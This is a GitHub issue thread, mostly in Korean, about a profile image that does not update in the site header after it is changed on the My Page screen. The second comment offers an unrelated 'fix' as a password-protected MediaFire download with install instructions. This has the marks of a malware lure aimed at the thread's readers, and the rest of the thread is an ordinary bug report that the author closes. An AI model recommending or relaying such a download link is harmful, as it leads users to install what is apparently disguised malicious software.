### ISSUE TITLE
[BUG] 마이페이지에서 프로필 이미지를 변경해도 헤더에 바로 반영되지 않는 문제

### ISSUE THREAD

**Issue by Eomjihee** [Programmers-SpotLight/SpotLight#275]
## ✨ 버그 설명

- 마이페이지에서 프로필 이미지를 변경해도 헤더에 바로 반영되지 않는 문제
- 이미지가 꽉 차지않는 문제

## ✅  예상 해결 방안 

- [ ] 작업 1
- [ ] 작업 2
- [ ] 작업 3

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Eomjihee** [comment]
임의 클로즈
